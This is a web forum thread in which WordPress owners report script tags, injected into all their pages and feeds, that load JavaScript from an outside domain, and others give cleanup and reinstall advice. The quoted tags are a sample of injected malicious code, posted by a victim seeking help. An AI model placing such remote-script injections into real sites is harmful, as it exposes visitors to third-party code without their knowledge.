    Hello friends,

    I noticed a big problem for my blog. Hope you'll teach me how to fix it.

    The problem is that an HTML code is inserted in all my posts, pages, feed etc. of my wordpress blog.

    the code is like this (this appears below all the page source)

    <html>
    <head>
    </head>
    <body>
    <script language="javascript" src= "http://www.advpoints.com/js.php?uid=14023"></script>
    <script language="javascript" src= "http://www.advpoints.com/js.php?uid=14023"></script>
    <script language="javascript" src= "http://www.advpoints.com/js.php?uid=14023"></script>
    </body>
    </html>
    Code (markup):
    my blog url is mextena.com
    you can find the above code in all my posts, pages and even in my feed (mextena.com/feed).
    Can anyone tell me what is the problem? if yes, how can I fix it?

    i think your blog hacked.

    check this post: http://ocaoimh.ie/did-your-wordpress-site-get-hacked/

    - export the db from your admin panel,
    - backup the uploads folder in wp-content dirctory,
    - delete everything in your wordpress installation,
    - change your ftp, hosting account passwords,
    - scan your computer by kaspersky,
    - do not use warez ftp programs,
    - create a new blog,
    - upload the "upload" folder,
    - upload your theme(download a new version) and plugins
    - install your backup db,

    if you are lucky, you can solve it by this way. but the problem can be because of the server.

    yeah you got hacked,
    You'll need to go into every theme file and find that code and anything else that doesn't belong and delete it.

    Same thing happened to me once.

    Hi,
    I have the same issue with my wordpress site. Except, I remove all the codes related to advpoints and it keeps coming back. I have searched for the hidden administrator (not there), weird files (didn't find), no extra plugins being activated. Am at my wits end.

    simjo,
    You are going to have to go into your files and look at all index.html, wp-blog-header.php, sidebar.php and delete the lines from there. Except, as I mentioned earlier, it keeps coming back and I cannot find where it originates from.
